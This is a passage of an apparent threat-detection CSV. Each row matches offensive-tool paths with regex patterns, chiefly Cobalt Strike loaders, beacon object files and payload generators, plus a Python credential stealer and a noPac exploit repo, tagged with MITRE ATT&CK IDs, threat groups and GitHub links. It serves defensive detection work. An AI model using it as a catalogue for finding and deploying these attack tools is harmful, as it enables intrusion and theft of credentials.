- T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*/CrossC2/*",".{0,1000}\/CrossC2\/.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*/CrossC2Kit*",".{0,1000}\/CrossC2Kit.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*/CrossC2Kit/*",".{0,1000}\/CrossC2Kit\/.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*/CrossC2-test*",".{0,1000}\/CrossC2\-test.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*/CrossNet-Beta/*",".{0,1000}\/CrossNet\-Beta\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dr0op/CrossNet-Beta","1","1","N/A","10","10","360","56","2022-07-18T06:23:16Z","2021-02-08T10:52:39Z" "*/crunch-wordlist/*",".{0,1000}\/crunch\-wordlist\/.{0,1000}","offensive_tool_keyword","crunch","Generate a dictionary file containing words with a minimum and maximum length","T1596 - T1596.001","TA0043","N/A","N/A","Credential Access","https://sourceforge.net/projects/crunch-wordlist/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/crypt0p3g/*",".{0,1000}\/crypt0p3g\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","1","N/A","10","10","169","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "*/cs2modrewrite/*",".{0,1000}\/cs2modrewrite\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","570","110","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" "*/CS-BOFs/*",".{0,1000}\/CS\-BOFs\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","99","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "*/CSExec.py*",".{0,1000}\/CSExec\.py.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*/CSExec.py.git*",".{0,1000}\/CSExec\.py\.git.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*/csharp/process_injection/*",".{0,1000}\/csharp\/process_injection\/.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*/CSharpWinRM*",".{0,1000}\/CSharpWinRM.{0,1000}","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mez-0/winrmdll","1","1","N/A","10","10","138","28","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z" "*/C--Shellcode*",".{0,1000}\/C\-\-Shellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","python ShellCode Loader (Cobaltstrike&Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OneHone/C--Shellcode","1","1","N/A","10","10","21","2","2019-11-28T01:53:55Z","2019-11-05T09:48:14Z" "*/CS-Loader.go*",".{0,1000}\/CS\-Loader\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","786","145","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" "*/CS-Loader/*",".{0,1000}\/CS\-Loader\/.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","786","145","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" "*/CsOnTheFly.ps1*",".{0,1000}\/CsOnTheFly\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*/csOnvps/*",".{0,1000}\/csOnvps\/.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","288","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*/csOnvps/*",".{0,1000}\/csOnvps\/.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","288","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*/cs-rdll-ipc-example/*",".{0,1000}\/cs\-rdll\-ipc\-example\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","10","10","107","25","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z" "*/CS-Remote-OPs-BOF*",".{0,1000}\/CS\-Remote\-OPs\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/cstealer.git*",".{0,1000}\/cstealer\.git.{0,1000}","offensive_tool_keyword","cstealer","stealer discord token grabber, crypto wallet stealer, cookie stealer, password stealer, file stealer etc. app written in Python.","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/can-kat/cstealer","1","1","N/A","10","8","756","389","2024-04-26T21:18:07Z","2021-08-03T00:52:45Z" "*/cstealer.py*",".{0,1000}\/cstealer\.py.{0,1000}","offensive_tool_keyword","cstealer","stealer discord token grabber, crypto wallet stealer, cookie stealer, password stealer, file stealer etc. app written in Python.","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/can-kat/cstealer","1","1","N/A","10","8","756","389","2024-04-26T21:18:07Z","2021-08-03T00:52:45Z" "*/cs-token-vault/*",".{0,1000}\/cs\-token\-vault\/.{0,1000}","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","10","10","136","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" "*/ctfr.py*",".{0,1000}ctfr\.py.{0,1000}","offensive_tool_keyword","ctfr","Abusing Certificate Transparency logs for getting HTTPS websites subdomains.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0010","N/A","N/A","Information Gathering","https://github.com/UnaPibaGeek/ctfr","1","0","N/A","N/A","10","1897","287","2024-01-02T17:19:37Z","2018-03-06T01:14:28Z" "*/ctftool*",".{0,1000}ctftool.{0,1000}","offensive_tool_keyword","ctftool","This is ctftool. an interactive command line tool to experiment with CTF. a little-known protocol used on Windows to implement Text Services. This might be useful for studying Windows internals. debugging complex issues with Text Input Processors and analyzing Windows security.","T1547.001 - T1059 - T1057","TA0001 - TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/taviso/ctftool","1","0","N/A","N/A","10","1631","277","2021-09-17T21:02:25Z","2019-06-07T03:39:10Z" "*/cube0x0/noPac*",".{0,1000}\/cube0x0\/noPac.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/cube0x0/noPac","1","1","N/A","N/A","10","1300","319","2021-12-16T09:50:15Z","2021-12-11T19:27:30Z" "*/cuddlephish.git*",".{0,1000}\/cuddlephish\.git.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","10","4","311","25","2024-03-28T14:17:28Z","2023-08-02T14:30:41Z" "*/cuddlephish.html*",".{0,1000}\/cuddlephish\.html.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","10","4","311","25","2024-03-28T14:17:28Z","2023-08-02T14:30:41Z" 